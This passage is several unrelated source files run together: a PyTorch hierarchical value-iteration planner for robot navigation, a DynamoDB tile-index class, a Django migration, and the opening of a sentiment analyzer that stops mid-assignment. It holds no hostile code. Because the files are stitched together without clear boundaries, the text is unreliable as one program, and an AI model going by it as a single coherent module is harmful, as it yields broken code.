torch.cat([abstraction_1, level_2, goal_2], dim=1) # generate Level-2 reward map for conv in self.level_2_conv: abstraction_2 = conv(abstraction_2) abstraction_2 = self.r2(abstraction_2) r2 = abstraction_2 # reduce resolution (to fit resolution of Level-3) abstraction_2 = F.max_pool2d(abstraction_2, (2,2)) # pad abstraction_2 map (to match Level-3 size) abstraction_2 = self.abstraction_2_pad(abstraction_2) # Process Level-3: # stack with preprocessed Level-2 map and Level-3 goal map abstraction_3 = torch.cat([abstraction_2, level_3, goal_3], dim=1) # generate Level-3 reward map for conv in self.level_3_conv: abstraction_3 = conv(abstraction_3) reward_3 = abstraction_3 r3 = self.r3(abstraction_3) # generate reward map r = torch.cat([r1,r2,r3], dim=1) # prepare for 3D convolution r_4d = torch.empty(r.size(0),self.features,self.num_orientations,self.size_eff,self.size_eff, device=self.device) # sum over footprints r_4d[:,0,:,:,:] = F.conv2d(r[:,0::self.features,:,:], self.local_footprints_1.unsqueeze(1), padding=2, groups = self.num_orientations) for i in range(1,self.level_2_features+1): r_4d[:,i,:,:,:] = F.conv2d(r[:,i::self.features,:,:], self.local_footprints_2.unsqueeze(1), padding=1, groups = self.num_orientations) for i in range(self.level_2_features+1,self.features): r_4d[:,i,:,:,:] = F.conv2d(r[:,i::self.features,:,:], self.local_footprints_3.unsqueeze(1), padding=1, groups = self.num_orientations) # pad reward map r_pad = F.pad(r_4d,(1,1,1,1,1,1), 'constant', 0) # cyclic padding for orientations r_pad[:,:,0,1:-1,1:-1] = r_4d[:,:,-1,:,:] r_pad[:,:,-1,1:-1,1:-1] = r_4d[:,:,0,:,:] # transitions from high to low abstraction levels: # from Level-2 to Level-1 r_pad[:,0,1:-1,1:-1,0] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,1:-1,-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,0,1:-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,-1,1:-1] = F.interpolate(r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,0,1:-1,0,0] = r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,0,-1] = r_4d[:,1:self.level_2_features+1,:,self.size_eff//4-1,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,-1,0] = r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,0,1:-1,-1,-1] = r_4d[:,1:self.level_2_features+1,:,-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) # from Level-3 to Level-2 r_pad[:,1,1:-1,1:-1,0] = F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,1:-1,-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,0,1:-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,-1,1:-1] = F.interpolate(r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4].mean(1,keepdim=True), scale_factor = (1,2)).squeeze(1) r_pad[:,1,1:-1,0,0] = r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,0,-1] = r_4d[:,self.level_2_features+1:,:,self.size_eff//4-1,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,-1,0] = r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,self.size_eff//4-1].mean(1,keepdim=True).squeeze(1) r_pad[:,1,1:-1,-1,-1] = r_4d[:,self.level_2_features+1:,:,-self.size_eff//4,-self.size_eff//4].mean(1,keepdim=True).squeeze(1) # use same padding values for all Level-2 features for i in range(2,self.level_2_features+1): r_pad[:,i,:,1:-1,0] = r_pad[:,1,:,1:-1,0] r_pad[:,i,:,1:-1,-1] = r_pad[:,1,:,1:-1,-1] r_pad[:,i,:,0,1:-1] = r_pad[:,1,:,0,1:-1] r_pad[:,i,:,-1,1:-1] = r_pad[:,1,:,-1,1:-1] r_pad[:,i,:,0,0] = r_pad[:,1,:,0,0] r_pad[:,i,:,0,-1] = r_pad[:,1,:,0,-1] r_pad[:,i,:,-1,0] = r_pad[:,1,:,-1,0] r_pad[:,i,:,-1,-1] = r_pad[:,1,:,-1,-1] # value iteration (on each abstraction level in parallel) q1 = self.q1(r_pad[:,0,:,:,:].unsqueeze(1)) q2 = self.q2(r_pad[:,1:self.level_2_features+1,:,:,:]) q3 = self.q3(r_pad[:,self.level_2_features+1:,:,:,:]) v1, _ = torch.max(q1, dim=1, keepdim=True) v2, _ = torch.max(q2, dim=1, keepdim=True) v3, _ = torch.max(q3, dim=1, keepdim=True) v = torch.cat([v1,v2,v3],1) for i in range(0, self.k - 1): # information flow between levels after each iteration: # information flow from low to high abstraction level # (replace state value for more abstract cell with maximum state value from # the lower-level cells that describe the same area) v[:,1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,0,:,:,:].clone(), (2,2)) v[:,2,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,1,:,:,:].clone(), (2,2)) # circular padding for orientations v_pad = F.pad(v,(1,1,1,1,1,1), 'constant', 0) v_pad[:,:,0,1:-1,1:-1] = v[:,:,-1,:,:] v_pad[:,:,-1,1:-1,1:-1] = v[:,:,0,:,:] # information flow from high to low abstraction level # (pad lower-level with values from neighboring higher-level cells) v_pad[:,0:2,1:-1,1:-1,0] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1], scale_factor = (1,2)) v_pad[:,0:2,1:-1,1:-1,-1] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,1:-1] = F.interpolate(v[:,1:3,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,-1,1:-1] = F.interpolate(v[:,1:3,:,-self.size_eff//4,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,0] = v[:,1:3,:,self.size_eff//4-1,self.size_eff//4-1] v_pad[:,0:2,1:-1,0,-1] = v[:,1:3,:,self.size_eff//4-1,-self.size_eff//4] v_pad[:,0:2,1:-1,-1,0] = v[:,1:3,:,-self.size_eff//4,self.size_eff//4-1] v_pad[:,0:2,1:-1,-1,-1] = v[:,1:3,:,-self.size_eff//4,-self.size_eff//4] # Bellman update (on each abstraction level in parallel) q1 = F.conv3d( torch.cat([r_pad[:,0,:,:,:].unsqueeze(1), v_pad[:,0,:,:,:].unsqueeze(1)], 1), torch.cat([self.q1.weight, self.w], 1), stride=1, padding=0) q2 = F.conv3d( torch.cat([r_pad[:,1:self.level_2_features+1,:,:,:], v_pad[:,1,:,:,:].unsqueeze(1)], 1), torch.cat([self.q2.weight, self.w], 1), stride=1, padding=0) q3 = F.conv3d( torch.cat([r_pad[:,self.level_2_features+1:,:,:,:], v_pad[:,2,:,:,:].unsqueeze(1)], 1), torch.cat([self.q3.weight, self.w], 1), stride=1, padding=0) v1, _ = torch.max(q1, dim=1, keepdim=True) v2, _ = torch.max(q2, dim=1, keepdim=True) v3, _ = torch.max(q3, dim=1, keepdim=True) v = torch.cat([v1,v2,v3],1) # information flow from low to high abstraction level v[:,1,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,0,:,:,:].clone(), (2,2)) v[:,2,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4:-self.size_eff//4] = F.max_pool2d(v[:,1,:,:,:].clone(), (2,2)) # circular padding for orientations v_pad = F.pad(v,(1,1,1,1,1,1), 'constant', 0) v_pad[:,:,0,1:-1,1:-1] = v[:,:,-1,:,:] v_pad[:,:,-1,1:-1,1:-1] = v[:,:,0,:,:] # information flow from high to low abstraction level v_pad[:,0:2,1:-1,1:-1,0] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,self.size_eff//4-1], scale_factor = (1,2)) v_pad[:,0:2,1:-1,1:-1,-1] = F.interpolate(v[:,1:3,:,self.size_eff//4:-self.size_eff//4,-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,1:-1] = F.interpolate(v[:,1:3,:,self.size_eff//4-1,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,-1,1:-1] = F.interpolate(v[:,1:3, :,-self.size_eff//4,self.size_eff//4:-self.size_eff//4], scale_factor = (1,2)) v_pad[:,0:2,1:-1,0,0] = v[:,1:3,:,self.size_eff//4-1,self.size_eff//4-1] v_pad[:,0:2,1:-1,0,-1] = v[:,1:3,:,self.size_eff//4-1,-self.size_eff//4] v_pad[:,0:2,1:-1,-1,0] = v[:,1:3,:,-self.size_eff//4,self.size_eff//4-1] v_pad[:,0:2,1:-1,-1,-1] = v[:,1:3,:,-self.size_eff//4,-self.size_eff//4] # one-step look-ahead q1 = F.conv3d( torch.cat([r_pad[:,0,:,:,:].unsqueeze(1), v_pad[:,0,:,:,:].unsqueeze(1)], 1), torch.cat([self.q1.weight, self.w], 1), stride=1, padding=0) # get state values for neighbors of start state q_out = q1[:,:,:, self.size_eff//2, self.size_eff//2] orientation_slice = start_orientation.expand(1,self.num_actions,q1.size(0)).permute(2,1,0) q_out = q_out.gather(2, orientation_slice).squeeze(2) # map state values to action probabilities logits = self.fc(q_out) return logits def train(self, num_iterations=1, batch_size=128, lr= 0.001, plot_curves=False, lr_cycle_length = 10, print_stat=True, T_mult=1.5, lr_decay_factor=0.95): return _train(self, num_iterations=num_iterations, batch_size=batch_size, lr=lr, plot_curves=plot_curves, lr_cycle_length=lr_cycle_length, print_stat=print_stat, T_mult=T_mult, lr_decay_factor=lr_decay_factor) # compute next-step accuracy def test(self, batch_size=128, validation=True, full_length=True): return _test(self, batch_size=batch_size, validation=validation, full_length=full_length) # compute success rate for whole paths def rollout(self, batch_size=128, validation=True, num_workers=4): return _rollout(self, batch_size=batch_size, validation=validation, num_workers=num_workers) # train net using RMSprop and cyclic learning rate scheduler def _train(net, num_iterations=1, batch_size=128, lr= 0.001, plot_curves=False, lr_cycle_length = 48, print_stat=True, T_mult=1.5, lr_decay_factor=0.95): # load training data dataset = GridDataset_3d(net.size, num_orientations=net.num_orientations, full_paths=False, data_type='training') trainloader = DataLoader(dataset, batch_size = batch_size, shuffle = True, num_workers = 4) criterion = nn.CrossEntropyLoss() optimizer = optim.RMSprop(net.parameters(), lr, eps=1e-6) error_stat = [] evaluation_stat = [] rollout_stat = [] validation_epochs = [] # index of start epoch for each lr cycle best_success = 0. print('Starting Training.') print('Learning Rate Cycles: ', num_iterations) print('Batch size: ', batch_size) print('Expert demonstrations: ', len(dataset)) print('Optimizer: ', optimizer) T_max = int(lr_cycle_length) # lr cycle length eta_min = 0.0001 scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max, eta_min) # learning rate cycles for cycle in range(num_iterations): print('Cylce length: ', T_max) print('Learning rate: ', lr) for epoch in range(T_max): running_loss = 0.0 num_batches = 0 start_time_epoch = time.time() # run once over all training examples for i, data in enumerate(trainloader, 0): # reset gradients to zero optimizer.zero_grad() # get training data occ_maps, goal_maps, labels, start_orientations = data['environment'].to(net.device), data['goal'].to(net.device), data['label'].to(net.device), data['start orientation'].to(net.device) # forward pass outputs = net.forward(occ_maps, goal_maps, start_orientations) # compute training loss loss = criterion(outputs,torch.max(labels, 1)[1]) # backward pass loss.backward() optimizer.step() running_loss += loss.item() num_batches += 1 duration_epoch = time.time() - start_time_epoch # keep track of average loss for learning curve error_stat.append(running_loss/num_batches) print('[epoch %d] loss per batch: %.10f, time: %f' % (epoch + 1, running_loss / num_batches, duration_epoch)) scheduler.step() # save index of start epoch of current lr cycle (for learning curve visualization) if len(validation_epochs) == 0: validation_epochs.append(T_max) else: validation_epochs.append(validation_epochs[-1]+T_max) # test net on validation set accuracy = net.test(batch_size=2*batch_size, full_length=True, validation=True) accuracy_sampled = net.test(batch_size=2*batch_size, full_length=False, validation=True) evaluation_stat.append(accuracy) success=net.rollout(batch_size=2*batch_size, validation=True) rollout_stat.append(success) print('[cycle %d] accuracy (full): %f, accuracy (sampled): %f, success: %f, time: %f' % (cycle + 1, accuracy, accuracy_sampled, success, duration_epoch)) # save network state which achieves best success rate on validation set if success > best_success or cycle == 0: best_success = success torch.save(net.state_dict(), 'network/%s.pt' % net.name) # increase cycle length and decrease initial lr for next cycle T_max = int(ceil(T_max*T_mult)) lr *= lr_decay_factor optimizer = optim.RMSprop(net.parameters(), lr, eps=1e-6) scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max, eta_min) print('Finished Training.') print('') # get network state with best success rate on validation set net.load_state_dict(torch.load('network/%s.pt' % net.name)) # plot learning curves if plot_curves: plt.figure(0) plt.plot(range(len(error_stat)), error_stat) plt.savefig('learning_curves/training_loss_%s.png' % net.name) plt.figure(1) plt.plot(range(len(evaluation_stat)), evaluation_stat) plt.savefig('learning_curves/accuracy_%s.png' % net.name) plt.figure(2) plt.plot(range(len(rollout_stat)), rollout_stat) plt.savefig('learning_curves/success_%s.png' % net.name) # print training statistics to text file if print_stat: error_stat = np.array(error_stat) epoch_list = np.arange(1,len(error_stat)+1) train_data = np.column_stack((epoch_list, error_stat)) np.savetxt('learning_curves/training_loss_%s.txt' % net.name, train_data, delimiter = " ", fmt=("%d","%f"), header = "Epoch Loss") validation_epochs = np.array(validation_epochs) evaluation_stat = np.array(evaluation_stat) rollout_stat = np.array(rollout_stat) validation_data = np.column_stack((validation_epochs, evaluation_stat, rollout_stat)) np.savetxt('learning_curves/validation_%s.txt' % net.name, validation_data, delimiter = " ", fmt=("%d","%f","%f"), header = "Epoch Accuracy Success") # compute next-step accuracy def _test(net, batch_size=128, validation=True, full_length=True): with torch.no_grad(): if validation: # load validation set dataset = GridDataset_3d(net.size, data_type='validation', full_paths=full_length) else: print('Starting Test.') print('Full length: ', full_length) # load evaluation set dataset = GridDataset_3d(net.size, data_type='evaluation', full_paths=full_length) testloader = DataLoader(dataset, batch_size = batch_size, shuffle = False, num_workers = 4) num_wrong_actions = 0 num_batches = 0 running_loss = 0. running_loss_first_step = 0. start_time = time.time() # iterate once over each example for i, data in enumerate(testloader, 0): occ_maps, goal_maps, labels, start_orientations = data['environment'].to(net.device), data['goal'].to(net.device), data['label'].to(net.device), data['start orientation'].to(net.device) output = net.forward(occ_maps, goal_maps, start_orientations) num_batches += 1 # count wrong actions for j in range(output.size()[0]): # get action with highest probability action = output[j].max(0)[1] action = action.item() # get expert action label = labels[j].argmax(0).item() if action != label: num_wrong_actions += 1 duration = time.time() - start_time accuracy = 1 - num_wrong_actions/len(dataset) if not validation: print('Size of Test Set: ', len(dataset)) print('Loss per batch: ', running_loss / num_batches) print('Number of wrong actions: ', num_wrong_actions) print("Accuracy: ", accuracy) print("Time: ", duration) print('') return accuracy # unroll single full path (for visualization) def _get_path(net, dataset, map, map_index, start_pos, goal_pos, max_number_steps): with torch.no_grad(): success = True path = [start_pos] pos = start_pos for idx in range(max_number_steps): # ensure that whole perceptive area lies within grid world if pos[0] >= 3*map.size()[0]//4 or pos[0] < map.size()[0]//4 or pos[1] >= 3*map.size()[1]//4 or pos[1] < map.size()[1]//4: return (path, False) # reached goal if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: return (path, success) if idx > 0: # get indices of the cells that contain the wheels fl,fr,bl,br = get_wheel_coord(pos, net.rotation_step_size, net.leg_x, net.leg_y) fl,fr,bl,br = fl.round().long(),fr.round().long(),bl.round().long(),br.round().long() # check collision for each wheel if map[fl[0],fl[1]] == 1 or map[fr[0],fr[1]] == 1 or map[bl[0],bl[1]] == 1 or map[br[0],br[1]] == 1: success = False # get net input for current position start_orientation = pos[2].to(net.device) occ_map, goal_map = dataset.get_inputs((map_index, pos, goal_pos)) occ_map, goal_map = occ_map.unsqueeze_(0).to(net.device), goal_map.unsqueeze_(0).to(net.device) # predict next action action_vector = net.forward(occ_map, goal_map, start_orientation) action = get_action(action_vector[0], dim=3) # update position and orientation new_pos = pos + action if new_pos[2] < 0: new_pos[2] += net.num_orientations elif new_pos[2] >= net.num_orientations: new_pos[2] -= net.num_orientations path.append(new_pos) pos = new_pos if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: # reached goal return (path, success) else: # did not reach goal return (path, False) # compute success rate for whole paths def _rollout(net, batch_size=128, validation=True, num_workers=4): with torch.no_grad(): crashes = 0. diff = 0. net_length = 0. expert_length = 0. avg_length = 0. num_successful = 0 # load dataset and make it available to all workers global rollout_data if validation: rollout_data = GridDataset_3d(net.size, full_paths=True, data_type='validation') else: rollout_data = GridDataset_3d(net.size, full_paths=True, data_type='evaluation') iterations = rollout_data.num_examples # list of all tasks (describes task through map and path indices) open_paths = [(i,j) for i in range(rollout_data.num_examples) for j in range(rollout_data.num_paths_per_map)] paths = [[[rollout_data.expert_paths[map_id][path_id][0]] for path_id in range(rollout_data.num_paths_per_map)] for map_id in range(rollout_data.num_examples)] success = [[ False for path_id in range(rollout_data.num_paths_per_map)] for map_id in range(rollout_data.num_examples)] path_length = 0 if not validation: print("Starting Rollout-Test.") start_time = time.time() pool = Pool(processes=num_workers) while len(open_paths) != 0 and path_length < 1000: parameters = [] # get map indices and current positions for all open paths for map_id, path_id in open_paths: parameters.append((map_id, paths[map_id][path_id][-1], rollout_data.expert_paths[map_id][path_id][-1])) # get inputs for all open paths inputs = pool.map(_get_inputs, parameters) path_length += 1 current_open_task_id = 0 # predict next step for each open path for input_batch in batch(inputs,batch_size): # unpack inputs occ_maps, goal_maps, start_orientations = zip(*input_batch) occ_maps, goal_maps, start_orientations = torch.stack(occ_maps, dim=0).to(net.device), torch.stack(goal_maps,dim=0).to(net.device), torch.stack(start_orientations,dim=0).to(net.device) # predict next action action_vectors = net.forward(occ_maps, goal_maps, start_orientations) for i in range(action_vectors.size(0)): # update positions and paths map_id, path_id = open_paths[current_open_task_id] action = get_action(action_vectors[i], dim=3) pos = paths[map_id][path_id][-1] + action if pos[2] < 0: pos[2] += net.num_orientations elif pos[2] >= net.num_orientations: pos[2] -= net.num_orientations paths[map_id][path_id].append(pos) goal_pos = rollout_data.expert_paths[map_id][path_id][-1] # reached goal if pos[0] == goal_pos[0] and pos[1] == goal_pos[1] and pos[2] == goal_pos[2]: success[map_id][path_id] = True del open_paths[current_open_task_id] continue # check upper border for path length # (to detect oscillation) if path_length > 2*len(rollout_data.expert_paths[map_id][path_id]): del open_paths[current_open_task_id] continue # ensure that perceptive area lies completely within grid world if pos[0] >= 3*rollout_data.grids[map_id].size()[0]//4 or pos[0] < rollout_data.grids[map_id].size()[0]//4 or pos[1] >= 3*rollout_data.grids[map_id].size()[1]//4 or pos[1] < rollout_data.grids[map_id].size()[1]//4: del open_paths[current_open_task_id] continue # get indices of cells that contain the wheels fl,fr,bl,br = get_wheel_coord(pos, net.rotation_step_size, net.leg_x, net.leg_y) fl,fr,bl,br = fl.round().long(),fr.round().long(),bl.round().long(),br.round().long() # check collisions for each wheel if rollout_data.grids[map_id][fl[0],fl[1]] == 1 or rollout_data.grids[map_id][fr[0],fr[1]] == 1 or rollout_data.grids[map_id][bl[0],bl[1]] == 1 or rollout_data.grids[map_id][br[0],br[1]] == 1: del open_paths[current_open_task_id] continue current_open_task_id += 1 if not validation: if path_length % 20 == 0: print("Computed paths up to length ", path_length) pool.close() # count successful paths num_successful = 0 for i in range(rollout_data.num_examples): for j in range(rollout_data.num_paths_per_map): paths[i][j] = torch.stack(paths[i][j], dim=0) if success[i][j]: num_successful += 1 if not validation: # compare length of network and expert paths diff += get_path_length(paths[i][j], dim=3)-get_path_length(rollout_data.expert_paths[i][j],dim=3) net_length += get_path_length(paths[i][j], dim=3) expert_length += get_path_length(rollout_data.expert_paths[i][j], dim=3) if not validation: print("Success: ", num_successful/ len(rollout_data)) print("Path length (network): ", net_length) print("Path length (expert): ", expert_length) print("Average absolute path difference: ", diff/ num_successful) print("average relative path difference: ", net_length/expert_length) print("Duration: ", time.time() - start_time) print("") return num_successful/ len(rollout_data) def _get_inputs(parameters): with torch.no_grad(): map_index, pos_t1, pos_t2 = parameters rollout_img = rollout_data.grids[map_index] # environment map occ_map = rollout_img[pos_t1[0] - rollout_data.size//2:pos_t1[0]+rollout_data.size//2,pos_t1[1] - rollout_data.size//2:pos_t1[1]+rollout_data.size//2] # goal map goal_map = torch.FloatTensor(rollout_data.size, rollout_data.size).fill_(0) goal_orientation = pos_t2[2] local_pos_t2 = pos_t2[0:2] - pos_t1[0:2] + rollout_data.centre if local_pos_t2[0].item() >= 0 and local_pos_t2[0].item() < rollout_data.size and local_pos_t2[1].item() >= 0 and local_pos_t2[1].item() < rollout_data.size: goal_map[local_pos_t2[0], local_pos_t2[1]] = goal_orientation+1 return occ_map.unsqueeze(0), goal_map.unsqueeze(0), pos_t1[2] def batch(iterable, step=1): length = len(iterable) for i in range(0, length, step): yield iterable[i:min(i + step, length)] nddynamo/boss_tileindexdb.py # Copyright 2014 NeuroData (http://neurodata.io) # Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from __future__ import absolute_import from ndingest.settings.settings import Settings settings = Settings.load() import botocore import boto3 from boto3.dynamodb.conditions import Key, Attr from operator import floordiv from ndingest.util.bossutil import BossUtil import time #try: # # Temp try-catch while developing on Windows. # from spdb.c_lib.ndlib import XYZMorton #except Exception: # pass class BossTileIndexDB: def __init__(self, project_name, region_name=settings.REGION_NAME, endpoint_url=None): # creating the resource table_name = BossTileIndexDB.getTableName() dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) self.table = dynamo.Table(table_name) self.project_name = project_name @staticmethod def createTable(schema, region_name=settings.REGION_NAME, endpoint_url=None): """Create the tile index table in dynamodb. The table's name will be taken from settings.ini ([aws]tile_index_table). This method blocks until the table is created in DynamoDB. Args: schema (dict): Table's schema encoded in a dictionary. If TableName is set, it will be overwritten by the name in settings.ini. region_name (optional[string]): AWS region queue lives in. Extracted from settings.ini if not provided. endpoint_url (optional[string]): Provide if using a mock or fake Boto3 service. """ # creating the resource table_name = BossTileIndexDB.getTableName() schema['TableName'] = table_name dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) try: table = dynamo.create_table(**schema) except Exception as e: print (e) raise BossTileIndexDB.wait_table_create(table_name, region_name, endpoint_url) @staticmethod def wait_table_create(table_name, region_name=settings.REGION_NAME, endpoint_url=None): """Poll dynamodb at a 2s interval until the table creates.""" client = boto3.client('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) cnt = 0 while True: time.sleep(2) cnt += 1 if cnt > 50: # Give up waiting. return try: resp = client.describe_table(TableName=table_name) if resp['Table']['TableStatus'] == 'ACTIVE': return except: # May get an exception if table doesn't currently exist. pass @staticmethod def deleteTable(region_name=settings.REGION_NAME, endpoint_url=None): """Delete the ingest database in dynamodb""" # creating the resource table_name = BossTileIndexDB.getTableName() dynamo = boto3.resource('dynamodb', region_name=region_name, endpoint_url=endpoint_url, aws_access_key_id=settings.AWS_ACCESS_KEY_ID, aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY) try: table = dynamo.Table(table_name) table.delete() except Exception as e: print (e) raise @staticmethod def getTableName(): return settings.DYNAMO_TILEINDEX_TABLE def createCuboidEntry(self, chunk_key, task_id): """Create the initial entry for tracking tiles uploaded for a cuboid. Call this before using markTileAsUploaded(). The chunk_key represents the encodes the collection, experiment, channel/layer, and x, y, z, t indices of a cuboid. In addition, it encodes the number of tiles that comprises the cuboid in the case where there are less tiles than the normal size of a cuboid in the z direction. Args: chunk_key (string): Key used to store the entry for the cuboid. task_id (int): Task or job id that this cuboid belongs to. """ try: response = self.table.put_item( Item = { 'chunk_key': chunk_key, 'tile_uploaded_map': {}, 'task_id': task_id }) except botocore.exceptions.ClientError as e: print (e) raise def markTileAsUploaded(self, chunk_key, tile_key): """Mark the tile as uploaded. Marks the tile belonging to the cuboid specified by the channel name, resolution, and coordinates as uploaded. createCuboidEntry() must be called with the given chunk_key before tiles may be marked as uploaded. Args: chunk_key (string): Key used to store the entry for the cuboid. tile_key (string): Key to retrieve tile from S3 bucket. Returns: (dict): Map of uploaded tiles. """ try: response = self.table.update_item( Key = { 'chunk_key': chunk_key }, #UpdateExpression = 'ADD tile_uploaded_map.{} :uploaded'.format(tile_key), #ExpressionAttributeValues = { # ':uploaded': 1 #}, UpdateExpression = 'ADD #tilemap.#tilekey :uploaded', ExpressionAttributeNames = { '#tilemap': 'tile_uploaded_map', '#tilekey': tile_key }, ExpressionAttributeValues = { ':uploaded': 1 }, ReturnValues = 'ALL_NEW' ) return self.cuboidReady(chunk_key, response['Attributes']['tile_uploaded_map']) except botocore.exceptions.ClientError as e: print (e) raise def cuboidReady(self, chunk_key, tile_uploaded_map): """Verify if we have all tiles for a given cuboid. Args: chunk_key (string): Key used to store the entry for the cuboid. tile_uploaded_map (dict): Dictionary with tile keys as the keys. Presence of a tile indicates it's been uploaded. Returns: (bool) """ key_parts = BossUtil.decode_chunk_key(chunk_key) num_tiles = key_parts['num_tiles'] if num_tiles < settings.SUPER_CUBOID_SIZE[2]: return len(tile_uploaded_map) >= num_tiles return len(tile_uploaded_map) >= settings.SUPER_CUBOID_SIZE[2] def getCuboid(self, chunk_key): """Get the cuboid entry from the DynamoDB table. Args: chunk_key (string): Key used to store the entry for the cuboid. Returns: (dict|None): Keys include 'tile_uploaded_map' and 'chunk_key'. """ try: response = self.table.get_item( Key = { 'chunk_key' : chunk_key }, ConsistentRead = True, ReturnConsumedCapacity = 'INDEXES' ) # TODO write a yield function to pop one item at a time return response['Item'] if 'Item' in response else None except Exception as e: print (e) raise def getTaskItems(self, task_id): """Get all the cuboid entries for a given task from the table. Args: task_id (int): Id of upload task/job. Returns: (generator): Dictionary with keys: 'chunk_key', 'task_id', 'tile_uploaded_map'. """ try: response = self.table.query( IndexName = 'task_index', KeyConditionExpression = 'task_id = :task_id', ExpressionAttributeValues = { ':task_id' : task_id } ) for item in response['Items']: yield item except Exception as e: print (e) raise def deleteCuboid(self, chunk_key): """Delete cuboid from database. """ try: response = self.table.delete_item( Key = { 'chunk_key' : chunk_key } ) return response except botocore.exceptions.ClientError as e: print (e) raise # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('editorial', '0026_auto_20171012_1606'), ] operations = [ migrations.AlterField( model_name='task', name='completion_date', field=models.DateTimeField(help_text=b'Date and time task status is changed to complete.', auto_now_add=True, null=True), ), migrations.AlterField( model_name='task', name='inprogress_date', field=models.DateTimeField(help_text=b'Date and time task status is changed to in progress.', null=True, blank=True), ), ] ## ## A sense based sentiment analyzer ## ## ## borrows a lot from Vader ## import sys import math import yaml from importlib.resources import open_text #import sensitive.wsd from sensitive.wsd import pos2wn, disambiguate import wn from wn.morphy import Morphy en = wn.Wordnet('omw-en:1.4') morphy = Morphy(wn) ### ### Changes to the scores based on ### * punctuation DONE ### * capitalization DONE ### * intensification ### * negation ### * conjunctions (contrastive) ### * comparatives, superlatives # DONE, FIXME INCREMENTS ### * morphology based antonyms (hard) ### ### ### Constants ### # (empirically derived mean sentiment intensity rating increase for booster words) B_INCR = 0.293 B_DECR = -0.293 # (empirically derived mean sentiment intensity rating increase for booster words) COMP_INCR = 0.1 SUPR_INCR = 0.2 # (empirically derived mean sentiment intensity rating increase for using ALLCAPs to emphasize a word) C_INCR = 0.733 N_SCALAR = -0.74 ### highlighters ### have a score for before and after ### e.g. (but, 0.5, 1.5) #VADER, SOCAL 1, 2 ### (although, 1.0, 0.5) #SOCAL # yet # nevertheless # nonetheless # even so # however # still # notwithstanding # despite that # in spite of that # for all that # all the same # just the same # at the same time # be that as it may # though # although # still and all negators = 